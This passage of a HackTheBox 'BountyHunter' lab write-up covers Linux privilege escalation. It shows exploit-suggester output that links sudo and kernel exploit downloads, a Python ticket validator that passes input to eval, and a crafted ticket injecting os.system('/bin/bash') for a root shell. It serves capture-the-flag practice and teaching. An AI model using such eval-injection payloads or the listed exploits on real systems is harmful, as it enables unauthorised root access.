class=\"token number\">20.04</span>.2 LTS\nRelease:        <span class=\"token number\">20.04</span>\nCodename:       focal\n\n<span class=\"token comment\">#</span>\n Sudo version\n https://book.hacktricks.xyz/linux-unix/privilege-escalation<span class=\"token comment\">#sudo-version</span>\nSudo version <span class=\"token number\">1.8</span>.31\n\nPossible Exploits:\n<span class=\"token punctuation\">[</span>+<span class=\"token punctuation\">]</span> <span class=\"token punctuation\">[</span>CVE-2021-3156<span class=\"token punctuation\">]</span> <span class=\"token function\">sudo</span> Baron Samedit\n\n   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt\n   Exposure: probable\n   Tags: <span class=\"token assign-left variable\">mint</span><span class=\"token operator\">=</span><span class=\"token number\">19</span>,<span class=\"token punctuation\">[</span> <span class=\"token assign-left variable\">ubuntu</span><span class=\"token operator\">=</span><span class=\"token number\">18</span><span class=\"token operator\">|</span><span class=\"token number\">20</span> <span class=\"token punctuation\">]</span>, <span class=\"token assign-left variable\">debian</span><span class=\"token operator\">=</span><span class=\"token number\">10</span>\n   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main\n\n<span class=\"token punctuation\">[</span>+<span class=\"token punctuation\">]</span> <span class=\"token punctuation\">[</span>CVE-2021-3156<span class=\"token punctuation\">]</span> <span class=\"token function\">sudo</span> Baron Samedit <span class=\"token number\">2</span>\n\n   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt\n   Exposure: probable\n   Tags: <span class=\"token assign-left variable\">centos</span><span class=\"token operator\">=</span><span class=\"token number\">6</span><span class=\"token operator\">|</span><span 
class=\"token number\">7</span><span class=\"token operator\">|</span><span class=\"token number\">8</span>,<span class=\"token punctuation\">[</span> <span class=\"token assign-left variable\">ubuntu</span><span class=\"token operator\">=</span><span class=\"token number\">14</span><span class=\"token operator\">|</span><span class=\"token number\">16</span><span class=\"token operator\">|</span><span class=\"token number\">17</span><span class=\"token operator\">|</span><span class=\"token number\">18</span><span class=\"token operator\">|</span><span class=\"token number\">19</span><span class=\"token operator\">|</span><span class=\"token number\">20</span> <span class=\"token punctuation\">]</span>, <span class=\"token assign-left variable\">debian</span><span class=\"token operator\">=</span><span class=\"token number\">9</span><span class=\"token operator\">|</span><span class=\"token number\">10</span>\n   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main\n\n<span class=\"token punctuation\">[</span>+<span class=\"token punctuation\">]</span> <span class=\"token punctuation\">[</span>CVE-2021-22555<span class=\"token punctuation\">]</span> Netfilter heap out-of-bounds <span class=\"token function\">write</span>\n\n   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html\n   Exposure: probable\n   Tags: <span class=\"token punctuation\">[</span> <span class=\"token assign-left variable\">ubuntu</span><span class=\"token operator\">=</span><span class=\"token number\">20.04</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">{</span>kernel:5.8.0-*<span class=\"token punctuation\">}</span>\n   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c\n   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c\n   Comments: ip_tables kernel module must be loaded\n\n<span 
class=\"token punctuation\">[</span>+<span class=\"token punctuation\">]</span> <span class=\"token punctuation\">[</span>CVE-2017-5618<span class=\"token punctuation\">]</span> setuid <span class=\"token function\">screen</span> v4.5.0 LPE\n\n   Details: https://seclists.org/oss-sec/2017/q1/184\n   Exposure: <span class=\"token function\">less</span> probable\n   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154\n\n<span class=\"token function\">sudo</span> -l\nMatching Defaults entries <span class=\"token keyword\">for</span> development on bountyhunter:\n    env_reset, mail_badpass, <span class=\"token assign-left variable\">secure_path</span><span class=\"token operator\">=</span>/usr/local/sbin<span class=\"token punctuation\">\\</span>:/usr/local/bin<span class=\"token punctuation\">\\</span>:/usr/sbin<span class=\"token punctuation\">\\</span>:/usr/bin<span class=\"token punctuation\">\\</span>:/sbin<span class=\"token punctuation\">\\</span>:/bin<span class=\"token punctuation\">\\</span>:/snap/bin\n\nUser development may run the following commands on bountyhunter:\n    <span class=\"token punctuation\">(</span>root<span class=\"token punctuation\">)</span> NOPASSWD: /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py</code></pre></div>\n<p>There are several potential vulnerabilities, but I was interested in <code class=\"language-text\">ticketValidator.py</code>, which can be run with sudo without a password.</p>\n<h3 id=\"ticketvalidatorpy\" style=\"position:relative;\">ticketValidator.py</h3>\n<p>Here is the script:</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token comment\">#Skytrain Inc Ticket Validation System 0.1</span>\n<span class=\"token comment\">#Do not distribute this file.</span>\n\n<span class=\"token keyword\">def</span> <span class=\"token function\">load_file</span><span class=\"token punctuation\">(</span>loc<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">if</span> loc<span class=\"token punctuation\">.</span>endswith<span class=\"token punctuation\">(</span><span class=\"token string\">\".md\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">return</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span>loc<span class=\"token punctuation\">,</span> <span class=\"token string\">'r'</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">else</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Wrong file type.\"</span><span class=\"token punctuation\">)</span>\n        exit<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">def</span> <span class=\"token function\">evaluate</span><span class=\"token punctuation\">(</span>ticketFile<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token comment\">#Evaluates a ticket to check for ireggularities.</span>\n    code_line <span class=\"token operator\">=</span> <span class=\"token
boolean\">None</span>\n    <span class=\"token keyword\">for</span> i<span class=\"token punctuation\">,</span>x <span class=\"token keyword\">in</span> <span class=\"token builtin\">enumerate</span><span class=\"token punctuation\">(</span>ticketFile<span class=\"token punctuation\">.</span>readlines<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">if</span> i <span class=\"token operator\">==</span> <span class=\"token number\">0</span><span class=\"token punctuation\">:</span>\n            <span class=\"token keyword\">if</span> <span class=\"token keyword\">not</span> x<span class=\"token punctuation\">.</span>startswith<span class=\"token punctuation\">(</span><span class=\"token string\">\"# Skytrain Inc\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n                <span class=\"token keyword\">return</span> <span class=\"token boolean\">False</span>\n            <span class=\"token keyword\">continue</span>\n        <span class=\"token keyword\">if</span> i <span class=\"token operator\">==</span> <span class=\"token number\">1</span><span class=\"token punctuation\">:</span>\n            <span class=\"token keyword\">if</span> <span class=\"token keyword\">not</span> x<span class=\"token punctuation\">.</span>startswith<span class=\"token punctuation\">(</span><span class=\"token string\">\"## Ticket to \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n                <span class=\"token keyword\">return</span> <span class=\"token boolean\">False</span>\n            <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"Destination: </span><span class=\"token interpolation\"><span class=\"token 
punctuation\">{</span><span class=\"token string\">' '</span><span class=\"token punctuation\">.</span>join<span class=\"token punctuation\">(</span>x<span class=\"token punctuation\">.</span>strip<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token string\">' '</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">3</span><span class=\"token punctuation\">:</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">}</span></span><span class=\"token string\">\"</span></span><span class=\"token punctuation\">)</span>\n            <span class=\"token keyword\">continue</span>\n\n        <span class=\"token keyword\">if</span> x<span class=\"token punctuation\">.</span>startswith<span class=\"token punctuation\">(</span><span class=\"token string\">\"__Ticket Code:__\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n            code_line <span class=\"token operator\">=</span> i<span class=\"token operator\">+</span><span class=\"token number\">1</span>\n            <span class=\"token keyword\">continue</span>\n\n        <span class=\"token keyword\">if</span> code_line <span class=\"token keyword\">and</span> i <span class=\"token operator\">==</span> code_line<span class=\"token punctuation\">:</span>\n            <span class=\"token keyword\">if</span> <span class=\"token keyword\">not</span> x<span class=\"token punctuation\">.</span>startswith<span class=\"token punctuation\">(</span><span class=\"token string\">\"**\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n                <span class=\"token keyword\">return</span> <span class=\"token boolean\">False</span>\n            ticketCode <span class=\"token 
operator\">=</span> x<span class=\"token punctuation\">.</span>replace<span class=\"token punctuation\">(</span><span class=\"token string\">\"**\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token string\">\"+\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span>\n            <span class=\"token keyword\">if</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span>ticketCode<span class=\"token punctuation\">)</span> <span class=\"token operator\">%</span> <span class=\"token number\">7</span> <span class=\"token operator\">==</span> <span class=\"token number\">4</span><span class=\"token punctuation\">:</span>\n                validationNumber <span class=\"token operator\">=</span> <span class=\"token builtin\">eval</span><span class=\"token punctuation\">(</span>x<span class=\"token punctuation\">.</span>replace<span class=\"token punctuation\">(</span><span class=\"token string\">\"**\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n                <span class=\"token keyword\">if</span> validationNumber <span class=\"token operator\">></span> <span class=\"token number\">100</span><span class=\"token punctuation\">:</span>\n                    <span class=\"token keyword\">return</span> <span class=\"token boolean\">True</span>\n                <span class=\"token keyword\">else</span><span class=\"token punctuation\">:</span>\n                    <span class=\"token keyword\">return</span> <span class=\"token boolean\">False</span>\n    <span class=\"token keyword\">return</span> <span class=\"token 
boolean\">False</span>\n\n<span class=\"token keyword\">def</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    fileName <span class=\"token operator\">=</span> <span class=\"token builtin\">input</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Please enter the path to the ticket file.\\n\"</span><span class=\"token punctuation\">)</span>\n    ticket <span class=\"token operator\">=</span> load_file<span class=\"token punctuation\">(</span>fileName<span class=\"token punctuation\">)</span>\n    <span class=\"token comment\">#DEBUG print(ticket)</span>\n    result <span class=\"token operator\">=</span> evaluate<span class=\"token punctuation\">(</span>ticket<span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>result<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Valid ticket.\"</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">else</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Invalid ticket.\"</span><span class=\"token punctuation\">)</span>\n    ticket<span class=\"token punctuation\">.</span>close\n\nmain<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>This appears to be a script that accepts a file in a specific format as input and parses it.</p>\n<p>Exploring the system, I found the ticket format:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\">#cat 
/opt/skytrain_inc/invalid_tickets/390681613.md</span>\n\n<span class=\"token comment\"># Skytrain Inc</span>\n<span class=\"token comment\">## Ticket to New Haven</span>\n__Ticket Code:__\n**31+410+86**\n<span class=\"token comment\">##Issued: 2021/04/06</span>\n<span class=\"token comment\">#End Ticket</span></code></pre></div>\n<p>Here, <code class=\"language-text\">eval</code> is called when the first number (split by <code class=\"language-text\">+</code>) on the line after <code class=\"language-text\">__Ticket Code:__</code> has a mod-7 result equal to 4.</p>\n<p>This means the part <code class=\"language-text\">**31+410+86**</code> becomes the argument to <code class=\"language-text\">eval</code>, so I can embed a command to spawn a shell inside it.</p>\n<p>For a reference on calling a shell from <code class=\"language-text\">eval</code>, this Stack Overflow post was helpful:</p>\n<p>Reference: <a href=\"https://stackoverflow.com/questions/59519289/python-running-reverse-shell-inside-eval\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Python - running reverse shell inside eval() - Stack Overflow</a></p>\n<p>So I created the following file:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\">#cat mal.md</span>\n\n<span class=\"token comment\"># Skytrain Inc</span>\n<span class=\"token comment\">## Ticket to New Haven</span>\n__Ticket Code:__\n**11+100 <span class=\"token operator\">!=</span> <span class=\"token number\">0</span> and __import__<span class=\"token punctuation\">(</span><span class=\"token string\">'os'</span><span class=\"token punctuation\">)</span>.system<span class=\"token punctuation\">(</span><span class=\"token string\">'/bin/bash'</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> False**\n<span class=\"token comment\">##Issued: 2021/04/06</span>\n<span class=\"token comment\">#End 
Ticket</span></code></pre></div>\n<p>Running <code class=\"language-text\">ticketValidator.py</code> with sudo and passing this file spawns a root shell.</p>\n<h2 id=\"summary\" style=\"position:relative;\">Summary</h2>\n<p>True to the machine name, the process of finding bugs yourself to obtain root was quite enjoyable.</p>","fields":{"slug":"/hackthebox-linux-bugbountyhunter-en","tagSlugs":["/tag/hack-the-box-en/","/tag/linux-en/","/tag/easy-box-en/","/tag/english/"]},"frontmatter":{"date":"2021-11-25","description":"A writeup of the retired HackTheBox machine 'BountyHunter'.","tags":["HackTheBox (en)","Linux (en)","EasyBox (en)","English"],"title":"HackTheBox Writeup: BountyHunter (Easy/Linux)","socialImage":{"publicURL":"/static/dc4d8b7f8795f3c3d3489d9957d155f2/no-image.png"}}}},"pageContext":{"slug":"/hackthebox-linux-bugbountyhunter-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}